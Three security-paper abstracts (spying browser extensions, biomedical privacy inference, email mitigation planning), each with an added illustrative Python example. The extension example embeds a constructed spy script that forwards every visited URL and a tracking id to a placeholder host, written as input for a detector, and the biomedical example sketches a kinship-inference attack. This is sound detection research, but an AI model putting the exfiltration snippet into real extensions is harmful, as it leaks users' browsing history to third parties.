I Spy with My Little Eye: Analysis and Detection of Spying Browser Extensions
Anupama Aggarwal (IIIT - Delhi, India), Saravana Kumar (CEG, Guindy, India), Bimal Viswanath (UC Santa Barbara), Liang Zhang (Northeastern University), Ayush Shah (IIIT - Delhi, India), Ponnurangam Kumaraguru (IIIT - Delhi, India)
In this work, we take a step towards understanding and defending against spying browser extensions. These are extensions repurposed to capture online activities of a user and communicate the collected sensitive information to a third-party domain. We conduct an empirical study of such extensions on the Chrome Web Store. First, we present an in-depth analysis of the spying behavior of these extensions. We observe that these extensions steal a variety of sensitive user information, such as the complete browsing history (e.g., the sequence of web traversals), online social network (OSN) access tokens, IP address, and geolocation. Second, we investigate the potential for automatically detecting spying extensions by applying machine learning schemes. We show that using a Recurrent Neural Network (RNN), the sequence of browser API calls made by an extension can be a robust feature, outperforming hand-crafted features (used in prior work on malicious extensions) to detect spying extensions. Our RNN-based detection scheme achieves a high precision (90.02%) and recall (93.31%) in detecting spying extensions.
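The abstract's central detection idea is that the ordered sequence of browser API calls carries more signal than a bag of hand-picked API features. The following added example is not the paper's code or dataset: it statically extracts the ordered chrome.* API calls and network sinks from two constructed extension scripts (BENIGN_JS and SPY_JS) and scores the sequence with a pair of add-one-smoothed bigram models, a deliberately simple stand-in for the RNN, trained on a handful of constructed labelled call sequences. The API names are real Chrome extension APIs, but the training sequences, the scripts and the regex-based static extraction are assumptions made for the example.

```python
import math
import re
from collections import Counter

# Walks a script in source order and records every chrome.* API call plus the
# network sinks an exfiltrating extension needs. Static approximation of a
# call trace (assumption: source order ~ execution order for this toy).
CALL_RE = re.compile(
    r"\bchrome\.((?:[A-Za-z_]+\.)+[A-Za-z_]+)\s*\("
    r"|\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\s*\("
)


def extract_calls(js_source):
    """Ordered list of API calls / network sinks found in a script."""
    return [m.group(1) or m.group(2) for m in CALL_RE.finditer(js_source)]


def train_bigrams(sequences):
    """Bigram and predecessor counts with explicit start/end marks."""
    bigrams, prev_counts = Counter(), Counter()
    for seq in sequences:
        toks = ["<s>"] + list(seq) + ["</s>"]
        for a, b in zip(toks, toks[1:]):
            bigrams[(a, b)] += 1
            prev_counts[a] += 1
    return bigrams, prev_counts


class SequenceClassifier:
    """Two smoothed bigram models; decision = sign of the log-likelihood ratio."""

    def __init__(self, spying, benign):
        self.models = {"spying": train_bigrams(spying), "benign": train_bigrams(benign)}
        vocab = {tok for group in (spying, benign) for seq in group for tok in seq}
        self.vsize = len(vocab) + 1  # +1 for the end-of-sequence mark

    def log_prob(self, label, seq):
        bigrams, prev_counts = self.models[label]
        toks = ["<s>"] + list(seq) + ["</s>"]
        return sum(
            math.log((bigrams[(a, b)] + 1) / (prev_counts[a] + self.vsize))
            for a, b in zip(toks, toks[1:])
        )

    def score(self, seq):
        return self.log_prob("spying", seq) - self.log_prob("benign", seq)

    def classify(self, seq):
        return "spying" if self.score(seq) > 0 else "benign"


# Constructed labelled training sequences (not from the paper's corpus).
# Note that history.search appears in both classes: what differs is what follows it.
SPY_TRAIN = [
    ["runtime.onInstalled.addListener", "storage.local.set", "history.search", "fetch"],
    ["webRequest.onBeforeRequest.addListener", "storage.local.get", "fetch"],
    ["tabs.onUpdated.addListener", "tabs.query", "XMLHttpRequest"],
    ["cookies.getAll", "storage.local.get", "navigator.sendBeacon"],
]
BENIGN_TRAIN = [
    ["runtime.onInstalled.addListener", "storage.local.set"],
    ["browserAction.onClicked.addListener", "tabs.create"],
    ["tabs.onUpdated.addListener", "tabs.query", "storage.local.set"],
    ["history.search", "storage.local.set"],
    ["runtime.onMessage.addListener", "storage.local.get", "runtime.sendMessage"],
]
CLASSIFIER = SequenceClassifier(SPY_TRAIN, BENIGN_TRAIN)

# Constructed extension scripts used as classification input.
BENIGN_JS = """
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({enabled: true});
});
chrome.browserAction.onClicked.addListener(tab => {
  chrome.tabs.create({url: "https://example.com/help"});
});
"""
SPY_JS = """
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({id: Math.random()});
});
chrome.webRequest.onBeforeRequest.addListener(details => {
  chrome.storage.local.get("id", cfg => {
    fetch("https://tracker.example/collect?u=" + encodeURIComponent(details.url) + "&id=" + cfg.id);
  });
}, {urls: ["<all_urls>"]});
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_JS), ("spy", SPY_JS)):
        calls = extract_calls(src)
        print(name, calls, CLASSIFIER.classify(calls), round(CLASSIFIER.score(calls), 2))
```

The two sequences ["history.search", "storage.local.set"] and ["history.search", "fetch"] share the same API set, so a presence-based feature cannot separate them; the bigram model labels the first benign and the second spying because the transition into a network sink is what the spying class has learned.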
Dissecting Privacy Risks in Biomedical Data
Pascal Berrang (CISPA, Saarland University), Mathias Humbert (Swiss Data Science Center, ETH/EPFL), Yang Zhang (CISPA, Saarland University), Irina Lehmann (Helmholtz Centre for Environmental Research Leipzig, UFZ, Leipzig), Roland Eils (German Cancer Research Center (DKFZ) & University of Heidelberg), Michael Backes (CISPA, Saarland University)
The decreasing costs of molecular profiling have fueled the biomedical research community with a plethora of new types of biomedical data, enabling a breakthrough towards a more precise and personalized medicine. However, the release of these intrinsically highly sensitive data poses a severe new privacy threat. While biomedical data is largely associated with our health, there also exist various correlations between different types of biomedical data, along the temporal dimension, and also between family members. However, so far, the security community has focused on privacy risks stemming from genomic data, largely overlooking the manifold interdependencies between other biomedical data. In this paper, we present a generic framework for quantifying the privacy risks in biomedical data taking into account the various interdependencies between data (i) of different types, (ii) from different individuals, and (iii) at different times. To this end, we rely on a Bayesian network model that allows us to take all aforementioned dependencies into account and run exact probabilistic inference attacks very efficiently. Furthermore, we introduce a generic algorithm for building the Bayesian network, which encompasses expert knowledge for known dependencies, such as genetic inheritance laws, and learns previously unknown dependencies from the data. Then, we conduct a thorough inference risk evaluation with a very rich dataset containing genomic and epigenomic data of mothers and children over multiple years. Besides effective probabilistic inference, we further demonstrate that our Bayesian network model can also serve as a building block for other attacks. We show that, with our framework, an adversary can efficiently identify the parent-child relationships based on methylation data with a success rate of 95%.
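The abstract describes two uses of one Bayesian network: exact inference of a hidden attribute through cross-type and cross-individual dependencies, and kinship (parent-child) identification from methylation data. The added example below is not the paper's framework or dataset; it builds the smallest network that has both kinds of edge (Mendelian inheritance between a mother's and a child's genotype, and an assumed meQTL-style dependency of a discretised methylation read-out on the genotype at the same site), runs exact inference by enumeration, and turns the same model into a likelihood-ratio test for "parent-child" versus "unrelated". The allele frequencies, the P(methylation = high | genotype) table and the two methylation profiles are constructed; sites are assumed independent.

```python
import math

# Assumed meQTL-style dependency: P(methylation == "high" | minor-allele count).
METH_HIGH_GIVEN_GENOTYPE = {0: 0.1, 1: 0.5, 2: 0.9}


def genotype_prior(p):
    """Hardy-Weinberg prior over minor-allele count for minor-allele frequency p."""
    return {0: (1 - p) ** 2, 1: 2 * p * (1 - p), 2: p * p}


def transmission(parent_genotype, p):
    """P(child genotype | one parent's genotype); the other parent is a random
    population member. This edge encodes the inheritance law."""
    a = parent_genotype / 2  # probability the known parent transmits the minor allele
    return {0: (1 - a) * (1 - p), 1: a * (1 - p) + (1 - a) * p, 2: a * p}


def methylation_likelihood(genotype, observed):
    """P(observed methylation level | genotype): the cross-type edge."""
    ph = METH_HIGH_GIVEN_GENOTYPE[genotype]
    return ph if observed == "high" else 1 - ph


def child_genotype_posterior(p, mother_meth, child_meth):
    """Exact inference by enumeration over the hidden mother genotype:
    P(child genotype | mother's methylation, child's methylation)."""
    joint = {}
    for c in (0, 1, 2):
        joint[c] = sum(
            genotype_prior(p)[m] * methylation_likelihood(m, mother_meth)
            * transmission(m, p)[c] * methylation_likelihood(c, child_meth)
            for m in (0, 1, 2)
        )
    z = sum(joint.values())
    return {c: v / z for c, v in joint.items()}


def site_log_marginal(p, obs_a, obs_b, related):
    """log P(obs_a, obs_b) at one site, with the two genotypes linked by the
    inheritance edge (related=True) or drawn independently (related=False)."""
    total = 0.0
    for ga, pa in genotype_prior(p).items():
        dist_b = transmission(ga, p) if related else genotype_prior(p)
        for gb, pb in dist_b.items():
            total += pa * pb * methylation_likelihood(ga, obs_a) * methylation_likelihood(gb, obs_b)
    return math.log(total)


def kinship_llr(freqs, profile_a, profile_b):
    """Log-likelihood ratio parent-child vs unrelated, summed over independent sites."""
    return sum(site_log_marginal(p, a, b, True) - site_log_marginal(p, a, b, False)
               for p, a, b in zip(freqs, profile_a, profile_b))


def is_parent_child(freqs, profile_a, profile_b, threshold=0.0):
    return kinship_llr(freqs, profile_a, profile_b) > threshold


# Constructed data: ten sites with the same minor-allele frequency, a mother's
# profile, a child profile that is concordant everywhere, and an unrelated
# profile that disagrees at six of the ten sites.
FREQS = [0.2] * 10
MOTHER = ["high", "high", "low", "low", "high", "low", "low", "low", "high", "low"]
CHILD = list(MOTHER)
UNRELATED = ["low", "low", "low", "low", "low", "high", "high", "low", "low", "low"]

if __name__ == "__main__":
    print("child genotype posterior:", child_genotype_posterior(0.2, "high", "high"))
    print("LLR mother/child:", round(kinship_llr(FREQS, MOTHER, CHILD), 3))
    print("LLR mother/unrelated:", round(kinship_llr(FREQS, MOTHER, UNRELATED), 3))
```

With this toy table the prior mode for a site with p = 0.2 is genotype 0, but observing "high" methylation in both mother and child moves the posterior mode to genotype 1, which is the kind of leakage through a non-genomic data type that a genome-only risk model misses. The same enumeration, summed per site, separates the related pair (positive LLR) from the unrelated one (negative LLR) without any access to the genotypes themselves.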
Formally Reasoning about the Cost and Efficacy of Securing the Email Infrastructure
Patrick Speicher (CISPA, Saarland University), Marcel Steinmetz (CISPA, Saarland University), Robert Künnemann (CISPA, Saarland University), Milivoj Simeonovski (CISPA, Saarland University), Giancarlo Pellegrino (CISPA, Saarland University), Jörg Hoffmann (CISPA, Saarland University), Michael Backes (CISPA, Saarland University)
Security on the Internet has historically been added post-hoc, leaving services like email, which, after all, is used by 3.7 billion users, vulnerable to large-scale surveillance. For email alone, there is a multitude of proposals to mitigate known vulnerabilities, ranging from the introduction of completely new protocols to modifications of the communication paths used by big providers. Deciding which measures to deploy requires a deep understanding of the induced benefits, the cost and the resulting effects. This paper proposes the first automated methodology for making formal deployment assessments. Our planning algorithm analyses the impact and cost-efficiency of different known mitigation strategies against an attacker in a formal threat model. This novel formalisation of an infrastructure attacker includes routing, name resolution and application level weaknesses. We apply the methodology to a large-scale scan of the Internet, and assess how protocols like IPsec, DNSSEC, DANE, SMTP STS, SMTP over TLS and other mitigation techniques like server relocation can be combined to improve the confidentiality of email users in 45 combinations of attacker and defender countries and nine cost scenarios. This is the first deployment analysis for mitigation techniques at this scale.
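The abstract frames mitigation deployment as a planning problem: given an attacker with routing, name-resolution and application-layer capabilities, find the combination of mitigations that restores confidentiality at the lowest cost, and repeat that under different cost scenarios. The added example below is not the paper's planner or threat model; it is a deliberately small brute-force planner over the mitigations the abstract names (SMTP over TLS/STARTTLS, MTA-STS, DANE, DNSSEC, server relocation) with three attacker moves: passive on-path eavesdropping, STARTTLS stripping, and MX spoofing. The costs, the attacker profiles and the rules for which mitigation blocks which move (for example, that DANE needs DNSSEC, and that MTA-STS or DANE is what makes STARTTLS resist stripping) are simplified assumptions made for the example.

```python
from dataclasses import dataclass
from itertools import combinations

# Constructed cost scenario (arbitrary units); the paper evaluates nine of these.
COSTS = {"starttls": 1, "mta_sts": 2, "dane": 3, "dnssec": 5, "relocate": 20}


@dataclass(frozen=True)
class Threat:
    on_path: bool       # attacker network sits on the SMTP route (routing weakness)
    controls_dns: bool  # attacker can tamper with MX resolution (name-resolution weakness)


def attack_status(plan, threat):
    """Which attacker moves are blocked by a set of deployed mitigations.
    Simplified rules (assumptions for this example):
      - relocation takes the attacker off the route but does not fix DNS;
      - STARTTLS stops passive eavesdropping only;
      - STARTTLS resists stripping only when enforced via MTA-STS or DANE+DNSSEC;
      - MX spoofing is stopped by DNSSEC-validated records or an MTA-STS policy."""
    on_path = threat.on_path and "relocate" not in plan
    enforced_tls = "starttls" in plan and (
        "mta_sts" in plan or ("dane" in plan and "dnssec" in plan)
    )
    return {
        "passive_eavesdrop": (not on_path) or "starttls" in plan,
        "starttls_stripping": (not on_path) or enforced_tls,
        "mx_spoofing": (not threat.controls_dns) or "dnssec" in plan or "mta_sts" in plan,
    }


def plan_cost(plan, costs):
    return sum(costs[m] for m in plan)


def cheapest_plan(threat, costs):
    """Exhaustive search over mitigation subsets; returns (cost, plan) of the
    cheapest plan that blocks every attacker move, or None if none does."""
    best = None
    names = sorted(costs)
    for k in range(len(names) + 1):
        for subset in combinations(names, k):
            plan = frozenset(subset)
            if not all(attack_status(plan, threat).values()):
                continue
            cost = plan_cost(plan, costs)
            if best is None or cost < best[0]:
                best = (cost, plan)
    return best


def deployment_matrix(threats, scenarios):
    """Cheapest plan for every (attacker profile, cost scenario) pair, the shape
    of the abstract's attacker/defender-country by cost-scenario evaluation."""
    return {
        (threat, name): cheapest_plan(threat, costs)
        for threat in threats
        for name, costs in scenarios.items()
    }


SCENARIOS = {
    "baseline": COSTS,
    "mta_sts_expensive": dict(COSTS, mta_sts=10),  # e.g. no HTTPS policy host available
}
THREATS = [Threat(True, True), Threat(True, False), Threat(False, True), Threat(False, False)]

if __name__ == "__main__":
    for (threat, scenario), result in deployment_matrix(THREATS, SCENARIOS).items():
        print(threat, scenario, "->", result)
```

Reading the matrix shows the effect the abstract is after: against an on-path attacker who also controls resolution, STARTTLS plus MTA-STS is the cheapest complete plan in the baseline scenario, but once MTA-STS becomes expensive the planner switches to STARTTLS plus DANE plus DNSSEC, and relocation is never chosen because it leaves MX spoofing open at a higher price.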